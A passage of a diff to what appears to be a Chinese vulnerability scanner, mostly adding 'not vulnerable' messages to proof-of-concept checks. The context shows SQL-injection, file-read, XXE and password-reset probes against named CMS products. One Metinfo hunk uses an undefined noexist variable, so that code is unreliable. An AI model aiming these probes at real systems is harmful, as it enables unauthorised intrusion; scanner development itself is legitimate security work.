+            else:
+                cprint("[-]不存在foosun_City_ajax_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/fsmcms/fsmcms_columninfo_sqli.py

@@ -25,9 +25,11 @@ class fsmcms_columninfo_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在FSMCMS columninfo.jsp文件参数ColumnID SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在fsmcms_columninfo_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/fsmcms/fsmcms_p_replydetail_sqli.py

@@ -25,9 +25,11 @@ class fsmcms_p_replydetail_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在fsmcms SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在fsmcms_p_replydetail_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/fsmcms/fsmcms_setup_reinstall.py

@@ -26,9 +26,11 @@ class fsmcms_setup_reinstall_BaseVerify:
 
             if r'</font><input type="text" name="SetUpPath"' in req.text:
                 cprint("[+]存在FSMCMS网站重装漏洞...(中危)\tpayload: "+vulnurl, "yellow")
+            else:
+                cprint("[-]不存在fsmcms_setup_reinstall漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/gobetters/gobetters_multi_sqli.py

@@ -55,7 +55,7 @@ class gobetters_multi_sqli_BaseVerify:
             }
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                    cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+                cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
 
             vulnurl = self.url + "/web/department/departmentsave.php"
             post_data = {
@@ -66,8 +66,7 @@ class gobetters_multi_sqli_BaseVerify:
             }
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                    cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
-
+                cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
             vulnurl = self.url + "/web/monitor/monitormentsave.php"
             post_data = {
                 "deptid":"1",
@@ -77,7 +76,7 @@ class gobetters_multi_sqli_BaseVerify:
             }
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                    cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+                cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
 
             vulnurl = self.url + "/web/users/result.php"
             post_data = {
@@ -86,9 +85,11 @@ class gobetters_multi_sqli_BaseVerify:
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                     cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+            else:
+                cprint("[-]不存在gobetters_multi_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/gowinsoft_jw/gowinsoft_jw_multi_sqli.py

@@ -26,15 +26,18 @@ class gowinsoft_jw_multi_sqli_BaseVerify:
                 "/jiaoshi/xueji/dangan/sdangangai1.asp?id=1",
                 "/jiaoshi/xueji/shen/autobh.asp?jh=1"]
         vulnurl = self.url + payload
+        noexist = True
         try:
             for turl in urls:
                 vulnurl = self.url + turl + payload
                 req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                 if r"GAO JI@Microsoft" in req.text:
                     cprint("[+]存在金窗教务系统存在多处SQL注射漏洞...(高危)\tpayload: "+vulnurl, "red")
-
+                    noexist = False
+            if noexist:
+                cprint("[-]不存在gowinsoft_jw_multi_sqli漏洞", "white", "on_grey")
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/gpower/gpower_users_disclosure.py

@@ -23,9 +23,11 @@ class gpower_users_disclosure_BaseVerify:
 
             if r"totalProperty" in req.text:
                 cprint("[+]存在通元内容管理系统用户名泄露...(敏感信息)\tpayload: "+vulnurl, "green")
+            else:
+                cprint("[-]不存在gpower_users_disclosure漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/hanweb/hanweb_VerifyCodeServlet_install.py

@@ -34,8 +34,11 @@ class hanweb_VerifyCodeServlet_install_BaseVerify:
                         if req2.status_code == 200 and ('Licence' in req2.text or 'admin' in req2.text):
                             cprint("[+]存在大汉VerfiyCodeServlet越权漏洞...(高危)\tpayload: "+"1.先访问"+vulnurl+"\t2.再访问"+adminurl, "red")
 
+                        else:
+                            cprint("[-]不存在hanweb_VerifyCodeServlet_install漏洞", "white", "on_grey")
+
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/hanweb/hanweb_downfile_filedownload.py

@@ -25,9 +25,11 @@ class hanweb_downfile_filedownload_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"root:" in req.text and r"/bin/bash" in req.text:
                 cprint("[+]存在大汉downfile.jsp 任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在hanweb_downfile_filedownload漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/hanweb/hanweb_readxml_fileread.py

@@ -28,9 +28,11 @@ class hanweb_readxml_fileread_BaseVerify():
 
             if r"<driver-properties>" in req.text:
                 cprint("[+]存在大汉版通JCMS数据库读取漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在hanweb_readxml_fileread漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/iGenus/igenus_code_exec.py

@@ -25,9 +25,11 @@ class igenus_code_exec_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"Configuration File (php.ini) Path" in req.text:
                 cprint("[+]存在igenus命令执行漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在igenus_code_exec漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/iGenus/igenus_login_Lang_fileread.py

@@ -25,9 +25,11 @@ class igenus_login_Lang_fileread_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"root:" in req.text and r"/bin/bash" in req.text:
                 cprint("[+]存在iGenus邮箱系统login.php 参数Lang任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在igenus_login_Lang_fileread漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/iGenus/igenus_syslogin_Lang_fileread.py

@@ -26,9 +26,11 @@ class igenus_syslogin_Lang_fileread_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"root:" in req.text and r"/bin/bash" in req.text:
                 cprint("[+]存在iGenus邮箱系统管理中心sys/login.php 参数Lang任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在igenus_syslogin_Lang_fileread漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/inspur/inspur_ecgap_displayNewsPic_sqli.py

@@ -25,9 +25,11 @@ class inspur_ecgap_displayNewsPic_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"GAOJI" in req.text:
                 cprint("[+]存在浪潮ECGAP政务审批系统SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在inspur_ecgap_displayNewsPic_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/inspur/inspur_multi_sqli.py

@@ -37,15 +37,19 @@ class inspur_multi_sqli_BaseVerify:
                     "/ViewSource/SrcPrintList.aspx?SerailNO='/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",
                     "/Business/OfflineDownload.aspx?formId=BBQB'/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--&filetype=html&infoflowId=00263",
                     "/ViewSource/ProExamineView.aspx?ActivityInstanceId=&ActivitySchemeGuid=9a0b1f9e-d564-4ec9-945f-600b5a4dd2ed'/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--"]
+        noexist = True
         try:
             for payload in payloads:
                 vulnurl = self.url + payload
                 req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                 if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                     cprint("[+]存在qibocms知道系统注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+                    noexist = False
+            if noexist:
+                cprint("[-]不存在inspur_multi_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/iwms/iwms_bypass_js_delete.py

@@ -25,9 +25,11 @@ class iwms_bypass_js_delete_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if req.status_code == 200 and r"btnCreateFolder" in req.text:
                 cprint("[+]存在IWMS系统后台绕过&整站删除漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在iwms_bypass_js_delete漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/jeecg/jeecg_pwd_reset.py

@@ -25,9 +25,11 @@ class jeecg_pwd_reset_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"loginController.do?pwdInit" in req.text:
                 cprint("[+]存在jeecg 重置admin密码漏洞...(高危)\tpayload: "+vulnurl+"\tadmin:123456", "red")
+            else:
+                cprint("[-]不存在jeecg_pwd_reset漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/jeecms/jeecms_fpath_filedownload.py

@@ -25,9 +25,11 @@ class jeecms_fpath_filedownload_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if req.headers["Content-Type"] == "application/xml":
                 cprint("[+]存在jeecms download.jsp 参数fpath任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在jeecms_fpath_filedownload漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/joomla/joomla_com_docman_lfi.py

@@ -25,9 +25,11 @@ class joomla_com_docman_lfi_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if req.status_code == 200 and r"<?php" in req.text:
                 cprint("[+]存在joomla组件com_docman本地文件包含漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在joomla_com_docman_lfi漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/joomla/joomla_index_list_sqli.py

@@ -25,9 +25,11 @@ class joomla_index_list_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
                 cprint("[+]存在joomla 3.7.0 core SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在joomla_index_list_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/jumboecms/jumboecms_slide_id_sqli.py

@@ -26,9 +26,11 @@ class jumboecms_slide_id_sqli_BaseVerify:
             req2 = requests.get(falseurl, headers=headers, timeout=10, verify=False)
             if r"Stack trace" not in req1.text and r"Stack trace" in req2.text:
                 cprint("[+]存在JumboECMS V1.6.1 注入漏洞...(高危)\tpayload: "+falseurl, "red")
+            else:
+                cprint("[-]不存在jumboecms_slide_id_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/kingdee/kingdee_conf_disclosure.py

@@ -25,14 +25,18 @@ class kingdee_conf_disclosure_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if req.headers["Content-Type"] == "application/xml":
                 cprint("[+]存在金蝶AES系统Java web配置文件泄露漏洞...(高危)\tpayload: "+vulnurl, "green")
+            else:
+                cprint("[-]不存在kingdee_conf_disclosure漏洞", "white", "on_grey")
 
             vulnurl = self.url + "/eassso/WEB-INF/web.xml"
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if req.headers["Content-Type"] == "application/xml":
                 cprint("[+]存在金蝶AES系统Java web配置文件泄露漏洞...(高危)\tpayload: "+vulnurl, "green")
+            else:
+                cprint("[-]不存在kingdee_conf_disclosure漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/kingdee/kingdee_filedownload.py

@@ -23,9 +23,11 @@ class kingdee_filedownload_BaseVerify:
 
             if req.headers["Content-Type"] == "application/xml":
                 cprint("[+]存在金蝶办公系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在kingdee_filedownload漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/kingdee/kingdee_logoImgServlet_fileread.py

@@ -25,9 +25,11 @@ class kingdee_logoImgServlet_fileread_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"root:" in req.text and r"/bin/bash" in req.text:
                 cprint("[+]存在金蝶EAS任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在kingdee_logoImgServlet_fileread漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/kingdee/kingdee_resin_dir_path_disclosure.py

@@ -35,9 +35,11 @@ class kingdee_resin_dir_path_disclosure_BaseVerify:
 
                 if r"Directory" in req.text:
                     cprint("[+]存在金蝶协同系统远程信息泄露漏洞...(敏感信息)\tpayload: "+vulnurl, "green")
+                else:
+                    cprint("[-]不存在kingdee_resin_dir_path_disclosure漏洞", "white", "on_grey")
 
             except:
-                cprint("[-] "+__file__+"====>连接超时", "cyan")
+                cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/kxmail/kxmail_login_server_sqli.py

@@ -33,9 +33,11 @@ class kxmail_login_server_sqli_BaseVerify:
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if time.time() - start_time >= 6:
                 cprint("[+]存在科信邮件系统login.server.php 时间盲注漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+            else:
+                cprint("[-]不存在kxmail_login_server_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/lbcms/lbcms_webwsfw_bssh_sqli.py

@@ -25,14 +25,18 @@ class lbcms_webwsfw_bssh_sqli_BaseVerify:
                     "/Webwsfw/bssh/?object=11%20AnD%20SyS.Fn_VarBintoHexstr(HashBytes(%27MD5%27,%271234%27))>0--",
                     "/Webwsfw/bssh/?subsite=1%20AnD%20SyS.Fn_VarBintoHexstr(HashBytes(%27MD5%27,%271234%27))>0--"]
         try:
+            noexist = True
             for payload in payloads:
                 vulnurl = self.url + payload
                 req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                 if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                     cprint("[+]存在LBCMS多处SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+                    noexist = False
+            if noexist:
+                cprint("[-]不存在lbcms_webwsfw_bssh_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/libsys/libsys_ajax_asyn_link_fileread.py

@@ -16,18 +16,21 @@ class libsys_ajax_asyn_link_fileread_BaseVerify:
         self.url = url
 
     def run(self):
-        for payload in [r"/zplug/ajax_asyn_link.php?url=../opac/search.php",
-                        r"/opac/zplug/ajax_asyn_link.php?url=../opac/search.php",
-                        r"/hwweb/zplug/ajax_asyn_link.php?url=../opac/search.php"]:
-            vulnurl = self.url + payload
-            try:
-                req = requests.get(vulnurl, timeout=10, verify=False)
+        try:
+            noexist = True
+            for payload in [r"/zplug/ajax_asyn_link.php?url=../opac/search.php",
+                            r"/opac/zplug/ajax_asyn_link.php?url=../opac/search.php",
+                            r"/hwweb/zplug/ajax_asyn_link.php?url=../opac/search.php"]:
+                vulnurl = self.url + payload
 
+                req = requests.get(vulnurl, timeout=10, verify=False)
                 if r"<?php" in req.text:
                     cprint("[+]存在汇文图书管理系统文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
-
-            except:
-                cprint("[-] "+__file__+"====>连接超时", "cyan")
+                    noexist = False
+            if noexist:
+                cprint("[-]不存在libsys_ajax_asyn_link_fileread漏洞", "white", "on_grey")
+        except:
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/libsys/libsys_ajax_asyn_link_old_fileread.py

@@ -23,9 +23,11 @@ class libsys_ajax_asyn_link_old_fileread_BaseVerify:
 
             if r"<?php" in req.text:
                 cprint("[+]存在汇文图书管理系统文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在libsys_ajax_asyn_link_old_fileread漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/libsys/libsys_ajax_get_file_fileread.py

@@ -22,9 +22,11 @@ class libsys_ajax_get_file_fileread_BaseVerify:
 
             if r"<?php" in req.text:
                 cprint("[+]存在汇文图书管理系统文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在libsys_ajax_get_file_fileread漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/live800/live800_downlog_filedownload.py

@@ -23,9 +23,11 @@ class live800_downlog_filedownload_BaseVerify():
 
             if r"root:" in req.text and r"/bin/bash" in req.text:
                 cprint("[+]存在live800客服系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在live800_downlog_filedownload漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/live800/live800_fileDownloadServer_fileread.py

@@ -25,9 +25,11 @@ class live800_fileDownloadServer_fileread_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"root:" in req.text and r"/bin/bash" in req.text:
                 cprint("[+]存在live800 fileDownloadServer文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在live800_fileDownloadServer_fileread漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/live800/live800_loginAction_sqli.py

@@ -28,9 +28,11 @@ class live800_loginAction_sqli_BaseVerify:
 
             if time.time() - start_time >= 6:
                 cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在live800_loginAction_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/live800/live800_services_xxe.py

@@ -43,14 +43,18 @@ class live800_services_xxe_BaseVerify():
         }
         post_data = '''<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "81dc9bdb52d04dc20036dbd8313ed055">%remote;]>'''
         vulnurls = self.catch_service()
-        for vulnurl in vulnurls:
-            try:
+        try:
+            noexist = True
+            for vulnurl in vulnurls:
                 req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
                 if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                     cprint("[+]存在live800在线客服系统XML实体注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+                    noexist = False
+            if noexist:
+                cprint("[-]不存在live800_services_xxe漏洞", "white", "on_grey")
+        except:
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
-            except:
-                cprint("[-] "+__file__+"====>连接超时", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/live800/live800_sta_export_sqli.py

@@ -43,9 +43,11 @@ class live800_sta_export_sqli_BaseVerify:
 
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
+            else:
+                cprint("[-]不存在live800_sta_export_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
         headers={
             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
@@ -70,9 +72,11 @@ class live800_sta_export_sqli_BaseVerify:
 
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
+            else:
+                cprint("[-]不存在live800_sta_export_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
         turl = "/live800/sta/export/chatHoursSta.jsp"
         vulnurl = self.url + turl
@@ -90,9 +94,11 @@ class live800_sta_export_sqli_BaseVerify:
 
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
+            else:
+                cprint("[-]不存在live800_sta_export_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
         turl = "/live800/sta/export/chatUrlSta.jsp"
         vulnurl = self.url + turl
@@ -110,9 +116,11 @@ class live800_sta_export_sqli_BaseVerify:
 
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
+            else:
+                cprint("[-]不存在live800_sta_export_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/looyu/looyu_down_filedownload.py

@@ -23,9 +23,11 @@ class looyu_down_filedownload_BaseVerify:
 
             if r"root:" in req.text and r"/bin/bash" in req.text:
                 cprint("[+]存在乐语客服系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在looyu_down_filedownload漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/metinfo/metinfo_getpassword_sqli.py

@@ -32,9 +32,11 @@ class metinfo_getpassword_sqli_BaseVerify:
                 req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                 if time.time() - start_time >= 6:
                     cprint("[+]存在metinfo SQL盲注漏洞...(高危)\tpayload: "+vulnurl, "red")
+                else:
+                    cprint("[-]不存在metinfo_getpassword_sqli漏洞", "white", "on_grey")
 
             except:
-                cprint("[-] "+__file__+"====>连接超时", "cyan")
+                cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/metinfo/metinfo_login_check_sqli.py

@@ -27,8 +27,11 @@ class metinfo_login_check_sqli_BaseVerify:
             req2 = requests.get(false_url, headers=headers, timeout=10, verify=False)
             if r"not have this language" in req2.text and r"not have this language" not in req1.text:
                 cprint("[+]存在metinfo v5.3 SQL注入漏洞...(高危)\tpayload: "+false_url, "red")
+            if noexist:
+                cprint("[-]不存在metinfo_login_check_sqli漏洞", "white", "on_grey")
+
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/ndstar/ndstar_six_sqli.py

